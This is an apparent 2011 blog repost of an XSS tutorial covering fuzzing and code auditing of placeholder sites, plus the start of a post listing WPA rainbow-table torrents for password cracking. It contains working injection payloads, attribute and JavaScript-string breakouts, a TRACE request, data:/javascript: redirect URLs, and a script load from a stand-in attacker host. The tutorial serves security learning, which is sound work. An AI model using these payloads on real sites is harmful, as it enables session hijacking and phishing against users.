XSS Tutorial - From Bug to Vulnerability

9/30/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCsICJmPJO6ld-W7YsegFWgiYY7aRQ3tjQub1CWmvYNOwBSNDKLQ5u9OweGmYgpeUvkMMhAe1nSL1_mx4PkahQMf7dMTRWMfyVjgbSOkMPoEjvfSQ1f1Mxwkv82JswtFX7Ffi6HZYx4rrl/s1600/XSS+cross+site+scripting+vulnerability.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCsICJmPJO6ld-W7YsegFWgiYY7aRQ3tjQub1CWmvYNOwBSNDKLQ5u9OweGmYgpeUvkMMhAe1nSL1_mx4PkahQMf7dMTRWMfyVjgbSOkMPoEjvfSQ1f1Mxwkv82JswtFX7Ffi6HZYx4rrl/s400/XSS+cross+site+scripting+vulnerability.gif" width="400" /></a></div>
<br />
<div style="margin: 0px; padding: 0px;">
<div id="post_message_8389" style="margin: 0px; padding: 0px;">
<br />
Dear fellow members of RAH-Labs<br />
<br />
<br />
This tutorial was originally meant only for DeadHackers as an exclussive guide,<br />
however after they have changed their site multiple times I thought that<br />
I would post it here before it might get removed since this guide took a lot<br />
of time to create. (almost a whole day at work)<br />
<br />
This tutorial does NOT contain actual attack code so you'll have to make that up yourself.<br />
<br />
<b>___ -:: Introduction ::- ____________</b><br />
<br />
<br />
<b>What is <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> and what does it refer to?</b><br />
<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> aka Cross Site Scripting is a client-side attack where an attacker creates a malicious link,<br />
containing script- code which is then executed within the victim's browser. The script-code<br />
can be any language supported by the browser but mostly HTML and Javascript is used along<br />
with embedded Flash, Java or ActiveX.<br />
<br />
<b>What can Cross Site Scripting be used for?</b><br />
Cross Site Scripting can be used for a variety of things, such as session-hijacking, browser<br />
attacks, phishing, propaganda and even worms! However it still requires the victim to click<br />
a malicious link created by the attacker.<br />
<br />
<b>How could One get a victim to click a <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-link?</b><br />
The easiest way to get people to click malicious links is to make them look authentic and non-<br />
malicious. Giving them a reason afterwards is the social-engineering part which should be easy<br />
except if the victim is aware of such attacks and / or has measures against Cross Site Scripting, such as NoScript.<br />
<br />
<b>How does One avoid <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-links looking suspicious?</b><br />
This is typically done with encoding, short url services, redirects and even flash!<br />
<br />
<b>Which types of Cross Site Scripting are there?</b><br />
The most common types are GET- and POST-based <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>. However Cross Site Scripting can also<br />
be triggered via cookies. Some individuals claims that <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> can also be divided into persistent and<br />
non-persistent but those types are also and should be refered to as injection which is a different<br />
class of bugs / vulnerabilities.<br />
<br />
<b>What is the difference between GET- and POST-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>?</b><br />
The difference is that when GET-variables is used it is possible to conduct normal <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> attacks<br />
where an attacker sends a malicious crafted URL to the victim which is then executed when<br />
the victim opens the link in the browser.<br />
<br />
With POST-variables an attacker could f.ex. use flash to send the victim to the POST-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym><br />
vulnerable site since it is not possible to create a URL when POST-variables are in use.<br />
<br />
<b>Are there sub-categories of Cross Site Scripting?</b><br />
At the moment there's XSSR and <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym>. One could say that <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym>/<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> belongs to the same<br />
category, however the attack method differs too much from traditional Cross Site Scripting.<br />
XSSR or CSSR aka Cross Site Script Redirection is used to redirect a victim to another page<br />
unwillingly. The page can for example contain a phishing template, browser attack code or in<br />
some cases where the data or javascript URI scheme is used: session-hijacking. <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> is a<br />
mix of Cross Site Scripting and SQL Injection, where an unknowing victim clicks a malicious link<br />
containing SQL Injection instructions for an area in the website which requires privileges that<br />
guests or members doesn't have. <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym> or <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> (sometimes refered to as C-Surf) stands for<br />
Cross Site Request Forgery which is used to send input from a 3rd party site to the target site.<br />
<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym> can in some cases be triggered just by viewing a specially crafted image but the most<br />
commonly used are URLs. With Cross Site Request Forgery it might be possible to f.ex. alter<br />
the password of the victim if the target site is not secured properly with tokens etc.<br />
<br />
<b>Process  of XSS</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKMPe1R9HQhDScyucl-Gu0ITmTrDiWcnsFz8RmyXEFGhoRQxc6UDfZ8sQqhv8Q4KBnH1eYaZFVlosheAqcMFZsT6WaRaNsflTrsu6oYR3CP1jSGTOgM74EIquDqVP9YeIPuxCjDc0hJzP/s1600/xss_how.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKMPe1R9HQhDScyucl-Gu0ITmTrDiWcnsFz8RmyXEFGhoRQxc6UDfZ8sQqhv8Q4KBnH1eYaZFVlosheAqcMFZsT6WaRaNsflTrsu6oYR3CP1jSGTOgM74EIquDqVP9YeIPuxCjDc0hJzP/s640/xss_how.png" width="640" /></a></div>
<b> </b> <br />
<br />
<br />
<b>What is XST and can it be used for anything?</b><br />
XST also known as Cross Site (Script) Tracing is a way of abusing the HTTP Trace (Debug)<br />
protocol. Anything that an attacker sends to a web-server that has TRACE enabled will send<br />
the same answer back. If an attacker sends the following:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; height: 60px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">TRACE / HTTP/1.0     Host: target.tld     Custom-header: <script>alert(0)</script></pre>
</div>
Then the attacker will receive the same "Custom-header: <scr..." back allowing script execution.<br />
However after recent browser updates the following year(s) XST has been increasingly harder to<br />
control and execute properly.<br />
<br />
<b>How is it possible to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs within websites?</b><br />
There are 2 methods: code / script auditing or fuzzing which is described below.<br />
<br />
<b>What kind of tools is required to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs?</b> (REQ = Required, OPT = Optional)<br />
- REQ: An Internet Browser (such as FireFox) in case you're fuzzing.<br />
- REQ: A text-viewer (such as notepad) in case you're auditing.<br />
- OPT: An intercepting proxy in case you're doing more advanced <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>. (In FireFox it is possible to use Tamper Data).<br />
- OPT: Browser Addons, for FireFox the following are especially useful: Firebug, JSView and LiveHTTP Headers.<br />
<br />
<b>What else is useful to know if One wants to find <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> bugs?</b><br />
- Browser limitations regarding Cross Site Scripting [1]<br />
- HTTP Headers and how the HTTP protocol works.<br />
- HTML + Javascript and perhaps embedded script attacks. (flash etc.)<br />
- Intercepting proxies (Burp etc.), differential tools (meld, ExamDiff, etc.)<br />
- Useful browser-addons (see FireCat [3])<br />
- Website scanners (Nikto, W3AF, Grendel, Directory-fuzzers etc.)<br />
<br />
<b>Where is <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-bugs typically located?</b><br />
It is usually located in user submitted input either via GET or POST variables, where it is reflected on<br />
the target site as text outside tags, inside tag values or within javascript. It can also in some cases<br />
be submitted via cookies, http headers or in rare cases file uploads.<br />
<br />
<b>How does One protect a site against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>?</b><br />
The best way is to ensure that all user input and output is validated properly. However in some cases<br />
an IPS or WAF can also protect against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> though the best way is still to validate the user-input and -output properly.<br />
<br />
<b>___ -:: Finding the Bug - With Fuzzing ::- ____________</b><br />
<br />
<br />
<b>[EASY] Example Case - A:</b><br />
<br />
<br />
We're at <a href="http://buggysite.tld/">http://buggysite.tld/</a> where we see a "Search-field" in the top-right. Since we don't know the<br />
real source code but only the HTML-output of the site we will have to fuzz anything where it is possible<br />
to submit data. In some cases the data will be reflected on the site and in some cases it wont. If it doesn't<br />
we move on to the next cookie, header, get / post variable or whatever it is that we are fuzzing.<br />
<br />
The most effective way to fuzz is not to write: <script>alert(0)</script> since many sites has different<br />
precautions against Cross Site Scripting. Instead we create a custom string which in most cases wont<br />
trigger anything that might alter the output of the site or render error pages that aren't vulnerable.<br />
<br />
An example of an effective string could be: "keyword'/\><<br />
<br />
" ' /\ > and < are the most commonly used html characters used in Cross Site Scripting. However if we want<br />
to be really thorough then we could also add )(][}{% to the string that we are using to fuzz the target site.<br />
<br />
The reason why there's not two of " or ' is because this can trigger a WAF, IPS or whatever precaution the site<br />
might have tried to implement against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> instead of using a secure coding scheme /plan / development cycle.<br />
The reason why all characters are written as >< instead of <> is because this is a common bypass against <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-filters!<br />
<br />
With that in mind, we use the following string: "haxxor'/\>< to fuzz the search-field:<br />
<br />
Lets take a look at the returned HTML-code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <span style="color: #ff8000;"><input type=<span style="color: blue;">"text"</span> name=<span style="color: blue;">"search"</span> value=<span style="color: blue;">"<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>"</span> /></span> <span style="color: navy;"><br /></span> You searched for \"haxxor\'/\\>< which returned no results.     ...</pre>
</div>
As we can see the input tag encoded our fuzzing string correct, however the text afterwards did not encode it<br />
properly as it only added slashes which is completely useless against Cross Site Scripting in this case.<br />
<br />
By submitting the following string we can <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym> their website: <script>alert(0)</script> or perhaps <script src=<a href="http://h4x0r.tld/xss.js">http://h4x0r.tld/xss.js</a>></script><br />
<br />
Of course we don't know if the following characters : ( ) and . are filtered but in most cases they work.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://buggysite.tld/search.php?query=%3Cscript%3Ealert%280%29%3C/script%3E">http://buggysite.tld/search.php?query=<script>alert(0)</script></a><script>alert(0)</script> if GET-variables are used.<br />
<br />
<br />
<b>[EASY] Example Case - B:</b><br />
We're at <a href="http://yetanothersite.tld/">http://yetanothersite.tld/</a> where we see another search formular.<br />
<br />
The following is returned after our string is submitted to the search field:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <input type="text" name="search" value="\"haxxor\'/\\><span style="color: navy;"><" /></span> <span style="color: navy;"><br /></span> You searched for <b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b> which returned no results.     ...</pre>
</div>
In this case the string after the tag encoded the string properly, however the string inside the tag only had some<br />
slashes added which does nothing in this case. Basically we can bypass this easily with: "><script>alert(0)</script><br />
<br />
If we're going to load external javascript we will have to avoid using " and ' of course.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://yetanothersite.tld/search.php?query=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E">http://yetanothersite.tld/search.php?query="><script>alert(0)</script></a> if GET-variables are used.<br />
<br />
<b>[MODERATE] Example Case - C:</b><br />
We're at <a href="http://prettysecure.tld/">http://prettysecure.tld/</a> where we find yet another search field, it's time to submit our fuzzing string.<br />
<br />
The following HTML-code is returned after our string is submitted:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">...     <span style="color: #ff8000;"><input type=<span style="color: blue;">"text"</span> name=<span style="color: blue;">"search"</span> value=<span style="color: blue;">"<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>"</span>></span> You searched for "<b><i>&quot;</i></b>haxxor'/\<b><i>&gt;</i></b><b><i>&lt;</i></b>" which returned no results.     ... (further down)     <span style="color: maroon;"><script></span>     ...     s.prop1="prettysecure";     s.prop2="\"haxxor%39/\%3E%3C";     s.prop3="adspace";     ...     <span style="color: maroon;"></script></span></pre>
</div>
For most people this might look secure but it really isn't. A lot of people also overlooks potential Cross Site Scripting<br />
vectors if their string <script>alert(0)</script> is either not output directly or encoded where they expect the <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym><br />
bug to be. This is why it is important to use a keyword that doesn't exist on the site, such as haxxor or something<br />
better. The reason why a keyword is used is because it is searchable almost always, you can call it a <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-locator. [1]<br />
<br />
Anyway, back to our example. s.prop2="\"haxxor%39/\%3E%3C"; looks secure but the flaw is that backspace aka \ is not<br />
filtered or encoded correct. So if we write: \" it will become \\", which will escape the first \ but not our quote.<br />
As you can see, we can't use tags either so we'll have to do something else.<br />
<br />
We have of course checked that brackets ( ) are NOT filtered. (in some cases they can be).<br />
<br />
By entering the following string we are able to create an alert box: \"; alert(0); s.prop500=\"<br />
This will become: s.prop2=\\"; alert(0); s.prop500=\\" when we submit the string. The reason why we add the s.prop500=\"<br />
variable to our string is because the javascript will most likely NOT execute if we don't. We could also use comments so instead<br />
of s.prop500=\" we just use // in the end of the string.<br />
<br />
In this case it is also possible to execute external javascript if One uses a bit more advanced javascript.<br />
In order to do this we can use document.write(String.fromCharCode()); where you will need a decimal converter.<br />
<br />
Our final <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Scripting">XSS</acronym>-url could be: <a href="http://prettysecure.tld/search.php?query=%5C">http://prettysecure.tld/search.php?query=\</a>"; alert(0); s.prop500=\"<br />
<br />
<b>___ -:: Finding the Bug - With Auditing ::- ____________</b><br />
<b>[EASY] Example Case - A:</b><br />
<br />
The following file (index.php) has some interesting code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
PHP Code:</div>
<div class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-size: 12px; height: 96px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">
<code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><span style="color: black;"><span style="color: #0000bb;">    </span><span style="color: #007700;">...<br />
    if(</span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'view_profile'</span><span style="color: #007700;">]==</span><span style="color: #0000bb;">1</span><span style="color: #007700;">) {<br />
    echo </span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'name'</span><span style="color: #007700;">];<br />
    ... (</span><span style="color: #0000bb;">more code</span><span style="color: #007700;">)<br />
    }<br />
    ...  </span><span style="color: #0000bb;"></span></span></code></code></div>
</div>
By looking at the above code we can see that if view_profile is equal to 1 then the script prints the "name" variable.<br />
An example attack URL could look like: <a href="http://testz.tld/index.php?view_profile=1&name=">http://testz.tld/index.php?view_profile=1&name=</a><script>alert(0)</script><br />
<br />
<b>[HARD] Example Case - B:</b><br />
<br />
The following file (search.php) has some interesting code:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
PHP Code:</div>
<div class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-size: 12px; height: 96px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">
<code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><code style="font-family: monospace; line-height: 12px; margin: 0px; padding: 0px;"><span style="color: black;"><span style="color: #0000bb;">    </span><span style="color: #007700;">...<br />
    if(</span><span style="color: #0000bb;">$_GET</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'set_flag'</span><span style="color: #007700;">]==</span><span style="color: #0000bb;">1</span><span style="color: #007700;">) {<br />
    </span><span style="color: #0000bb;">$var </span><span style="color: #007700;">= </span><span style="color: #dd0000;">"checked"</span><span style="color: #007700;">;<br />
    }<br />
    echo </span><span style="color: #dd0000;">"<input type='radio' value='flag' checked='" </span><span style="color: #007700;">.</span><span style="color: #0000bb;">htmlentities</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$var</span><span style="color: #007700;">). </span><span style="color: #dd0000;">"' />"</span><span style="color: #007700;">;<br />
    ...  </span><span style="color: #0000bb;"></span></span></code></code></div>
</div>
This is a conditional vulnerability where register_globals in php.ini has to be set to On. (Off is factory default).<br />
Register_Globals basically allows an individual to set variables on the fly, even if they are not meant to be set.<br />
<br />
This only applies to variables that are NOT set as in the example above. Another problem we have encountered<br />
is htmlentities however due to a coding error we can still abuse the tag without creating a new.<br />
We will need to use event handlers in the <input> tag and some CSS (Cascading Style Sheet) to make sure that<br />
the victim triggers the eventhandler no matter what. There's multiple ways of doing that, one of them is:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;">style='display:block;width:99999px;height:99999px;'</pre>
</div>
An eventhandler that we could use in this case could be onmouseover, even though onblur might be better.<br />
<br />
You might ask yourself, why is the above script not secure? Because htmlentities() used that way is insecure, due to<br />
that the tag looks like this in html form: <input type='radio' value='flag' checked='$var' /><br />
<br />
Inside the checked value our variable ($var) is encoded, but only " > and < are encoded, not ' due to ENT_QUOTES<br />
were not set in the htmlentities function. This means that we can break out of checked='' easily.<br />
<br />
An example attack URL could be: <a href="http://was-secure.tld/search.php?test=%27%20style=%27display:block;width:99999px;height:99999px;%20%27%20onmouseover=%27alert%280%29">http://was-secure.tld/search.php?test=' style='display:block;width:99999px;height:99999px; ' onmouseover='alert(0)</a><br />
<br />
<br />
There is no "Example Case - C" since I have gone through most the important of Cross Site Scripting.<br />
<br />
<b>___ -:: Additional Information ::- ____________</b><br />
<b>XSSR</b><br />
<br />
<br />
When it is possible to send a user to the data or javascript URI scheme either via A) GET- or POST-variables or B) User<br />
submitted content such as a link then the XSSR category applies to the bug. However some individuals has claimed that<br />
a site that only accepts HTTP or HTTPS links via GET-variables also falls under the XSSR category.<br />
<br />
An example of XSSR could be: <a href="http://somesite.tld/redirect.php?link=data:text/html,%3Cscript%3Ealert%280%29%3C/script%3E">http://somesite.tld/redirect.php?link=data:text/html,<script>alert(0)</script></a><br />
And if the Javascript URI scheme is used: <a href="http://somesite.tld/redirect.php?link=javascript:alert%280%29;">http://somesite.tld/redirect.php?link=javascript<b></b>:alert(0);</a><br />
<br />
This has in some cases been known to leak cookies and is therefore used in session-hijacking.<br />
<br />
<b><acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym></b><br />
<br />
<br />
When a SQL Injection vulnerability exists within a privileged area of the target site, <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> becomes usable.<br />
<br />
An example of <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site SQL Injection">XSSQLI</acronym> could be tricking the administrator of "shouldbescure.tld" to click either the SQL Injection<br />
link or click a Cross Site Scripting link which contains a call to the SQL Injection in the privileged area of the site<br />
where this could be the vulnerable part:<a href="http://shouldbesecure.tld/admin.php?del=1%20AND%201=1/*"> http://shouldbesecure.tld/admin.php?del=1 AND 1=1/*</a><br />
<br />
<b><acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">XSRF</acronym></b><br />
<br />
<br />
Also known as <acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">CSRF</acronym> and C-Surf can be used against sites that doesn't use tokens which are usually hidden inside tags.<br />
A common way to use tokens against C-Surf attacks is to hide them inside tags like:<br />
<br />
<div class="bbcode_container" style="display: block; margin: 5px 20px 20px; padding: 0px;">
<div class="bbcode_description" style="margin: 0px; padding: 0px;">
HTML Code:</div>
<pre class="bbcode_code" style="background-color: #f2f6f8; border: 1px inset; direction: ltr; font-family: monospace; font-size: 12px; line-height: 12px; margin: 0px; overflow: scroll; padding: 6px; text-align: left;"><span style="color: #ff8000;"><input type=<span style="color: blue;">"hidden"</span> name=<span style="color: blue;">"anti-<acronym style="border-bottom: 1px dotted rgb(0, 0, 0); border-width: 0px 0px 1px; cursor: help; font-variant: normal;" title="Cross Site Request Forgery">csrf</acronym>"</span> value=<span style="color: blue;">"random token value"</span> /></span></pre>
</div>
If the tokens are not random enough it might be possible to calculate these and still use C-Surf in an attack.<br />
<br />
<br />
<br />
<b>References:</b><br />
[1] <a href="http://ha.ckers.org/xss.html" style="color: #417394; text-decoration: none;" target="_blank">http://ha.ckers.org/xss.html</a><br />
[2] <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" style="color: #417394; text-decoration: none;" target="_blank">http://en.wikipedia.org/wiki/Cross-site_scripting</a><br />
[3] <a href="http://firecat.intern0t.net/" style="color: #417394; text-decoration: none;" target="_blank">http://firecat.intern0t.net/</a><br />
[4] <a href="http://deadhackers.eu/boards/viewtopic.php?f=9&t=22" style="color: #417394; text-decoration: none;" target="_blank">http://deadhackers.eu/boards/viewtopic.php?f=9&t=22</a><br />
[5] <a href="http://project67555.appspot.com/security.html">http://project67555.appspot.com/security.html</a><br />
<br />
[6] <a href="http://tamilaffection.com/?p=751">http://tamilaffection.com/?p=751</a></div>
<div id="post_message_8389" style="margin: 0px; padding: 0px;">
<br />
</div>
</div>
</div>

Dear fellow members of RAH-Labs This tutorial was originally meant only for DeadHackers as an exclussive guide, however after th...

WPA Rainbow Tables (Offensive Security)

9/26/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGJq9HZsnV6frsJqVpuirgh6SpikUqZYi5uV8IlAutJfFSQukUztsVv5u-1Ei4rUV0dNyn0E1kmmAto4yhVG1HJkmK91g7K3dXXP0GtSz8aCHig92OPKo3kVshtQZOEvBngxFNnlh2094/s1600/Rainbow_tablepng.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGJq9HZsnV6frsJqVpuirgh6SpikUqZYi5uV8IlAutJfFSQukUztsVv5u-1Ei4rUV0dNyn0E1kmmAto4yhVG1HJkmK91g7K3dXXP0GtSz8aCHig92OPKo3kVshtQZOEvBngxFNnlh2094/s1600/Rainbow_tablepng.png" width="320" /></a></div>
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;"></span><br />
<div class="news_content_title" style="color: white; font-size: 19px; padding-left: 0px; vertical-align: middle;">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;"><span class="color_nc_2" style="color: #4a4a4a; font-size: 15px; padding-left: 2px; vertical-align: middle;"><span style="text-transform: uppercase;">WPA RAINBOW TABLES (OFFENSIVE SECURITY)</span></span></span><br />
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;"><span class="color_nc_2" style="color: #4a4a4a; font-size: 15px; padding-left: 2px; vertical-align: middle;"><span style="text-transform: uppercase;"><br />
</span></span></span></div>
<div class="news_content" style="margin: 0px 26px 0px 0px; padding-left: 5px; text-align: justify;">
<div class="chapo">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;"><img alt="" class="red_arrow" src="http://www.security-database.com/toolswatch/images/a1.gif" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; margin-right: 5px;" />Full list of torrents with WPA Rainbow Tables, from Offensive Security.</span></div>
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;"><br class="nettoyeur" /></span>
<br />
<div class="texte">
<div class="spip">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;">Each of the following links below are to a .torrent file which enables you to download a Cowpatty WPA Rainbow Table using <a class="spip_glossaire" href="http://en.wikipedia.org/wiki/BitTorrent" style="color: #b23737;" target="_blank">BitTorrent</a>. All of the tables are <b class="spip">SSID</b> specific and use a 49 million WPA optimised password dictionary file. Please take note that each of the tables is 1.9 GB in size.</span></div>
<div class="spip">
<span class="Apple-style-span" style="color: #4a4a4a; font-family: "tahoma"; font-size: 11px;">The password file that was used to generate these lists can be found <a class="spip_out" href="http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2" style="color: #b23737;" target="_blank">here</a>.</span></div>
<ul class="spip">
